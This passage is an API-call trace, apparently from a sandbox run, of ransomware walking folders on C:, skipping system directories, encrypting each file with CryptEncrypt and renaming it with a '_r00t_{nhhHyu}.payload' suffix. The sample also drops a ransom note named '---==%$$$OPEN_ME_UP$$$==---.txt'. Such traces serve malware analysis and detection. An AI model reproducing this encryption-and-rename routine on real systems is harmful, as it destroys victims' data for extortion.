lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.645] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0059.645] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.645] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.645] GetTickCount () returned 0x114f57d [0059.645] GetTickCount () returned 0x114f57d [0059.645] GetTickCount () returned 0x114f57d [0059.645] GetTickCount () returned 0x114f57d [0059.645] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.645] GetProcessHeap () returned 0x5e0000 [0059.645] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.645] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.647] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.647] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.648] GetProcessHeap () returned 0x5e0000 [0059.648] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.648] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.648] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.648] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.648] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.648] CloseHandle (hObject=0x438) returned 1 [0059.650] GetProcessHeap () returned 0x5e0000 [0059.650] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.650] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0059.650] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0059.651] GetProcessHeap () returned 0x5e0000 [0059.651] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.651] FindNextFileW (in: hFindFile=0x6064e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.651] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0059.651] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0059.651] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0059.651] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0059.651] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0059.651] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 49 [0059.652] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0059.652] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.652] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0059.652] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.652] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.652] GetTickCount () returned 0x114f58c [0059.652] GetTickCount () returned 0x114f58c [0059.652] GetTickCount () returned 0x114f58c [0059.652] GetTickCount () returned 0x114f58c [0059.652] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.652] GetProcessHeap () returned 0x5e0000 [0059.652] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.652] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.664] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.664] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.664] GetProcessHeap () returned 0x5e0000 [0059.664] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.664] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.665] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.665] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.665] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.665] CloseHandle (hObject=0x438) returned 1 [0059.666] GetProcessHeap () returned 0x5e0000 [0059.666] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.666] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0059.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0059.667] GetProcessHeap () returned 0x5e0000 [0059.667] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.667] FindNextFileW (in: hFindFile=0x6064e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.667] FindClose (in: hFindFile=0x6064e0 | out: hFindFile=0x6064e0) returned 1 [0059.667] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1049\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0059.667] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1049\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0059.668] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0059.668] CloseHandle (hObject=0x430) returned 1 [0059.669] GetProcessHeap () returned 0x5e0000 [0059.669] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0059.669] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1053", cAlternateFileName="")) returned 1 [0059.669] lstrcmpiW (lpString1="1053", lpString2="Windows") returned -1 [0059.669] lstrcmpiW (lpString1="1053", lpString2="$Recycle.bin") returned 1 [0059.669] lstrcmpiW (lpString1="1053", lpString2="System Volume Information") returned -1 [0059.669] lstrcmpiW (lpString1="1053", lpString2="Program Files") returned -1 [0059.669] lstrcmpiW (lpString1="1053", lpString2="Program Files (x86)") returned -1 [0059.669] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053") returned 30 [0059.669] lstrcmpW (lpString1="1053", lpString2=".") returned 1 [0059.669] lstrcmpW (lpString1="1053", lpString2="..") returned 1 [0059.669] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0059.669] GetProcessHeap () returned 0x5e0000 [0059.669] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0059.669] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\*") returned 32 [0059.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606260 [0059.670] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0059.670] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0059.670] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0059.670] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0059.670] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0059.670] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\.") returned 32 [0059.670] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.670] FindNextFileW (in: hFindFile=0x606260, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0059.670] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0059.670] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0059.670] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0059.670] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0059.670] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0059.670] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\..") returned 33 [0059.670] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.670] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.670] FindNextFileW (in: hFindFile=0x606260, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.670] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0059.670] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0059.670] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0059.670] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0059.670] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0059.670] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 39 [0059.670] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0059.670] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.671] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0059.671] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.671] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.671] GetTickCount () returned 0x114f59c [0059.671] GetTickCount () returned 0x114f59c [0059.671] GetTickCount () returned 0x114f59c [0059.671] GetTickCount () returned 0x114f59c [0059.671] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.671] GetProcessHeap () returned 0x5e0000 [0059.671] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.671] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xf19, lpOverlapped=0x0) returned 1 [0059.672] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff0e7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.672] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xf19, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xf19, lpOverlapped=0x0) returned 1 [0059.673] GetProcessHeap () returned 0x5e0000 [0059.673] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.673] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.673] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.673] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.673] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.673] CloseHandle (hObject=0x438) returned 1 [0059.674] GetProcessHeap () returned 0x5e0000 [0059.674] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.674] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0059.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0059.763] GetProcessHeap () returned 0x5e0000 [0059.763] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.763] FindNextFileW (in: hFindFile=0x606260, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0059.763] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0059.763] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 48 [0059.763] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0059.763] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.763] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0059.763] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.763] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.764] GetTickCount () returned 0x114f5fa [0059.764] GetTickCount () returned 0x114f5fa [0059.764] GetTickCount () returned 0x114f5fa [0059.764] GetTickCount () returned 0x114f5fa [0059.764] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.764] GetProcessHeap () returned 0x5e0000 [0059.764] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.764] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.766] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.766] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.767] GetProcessHeap () returned 0x5e0000 [0059.767] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.767] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.767] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.767] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.767] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.767] CloseHandle (hObject=0x438) returned 1 [0059.770] GetProcessHeap () returned 0x5e0000 [0059.770] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.770] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0059.770] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0059.770] GetProcessHeap () returned 0x5e0000 [0059.770] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.770] FindNextFileW (in: hFindFile=0x606260, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.770] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0059.770] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0059.770] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0059.770] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0059.770] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0059.770] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: 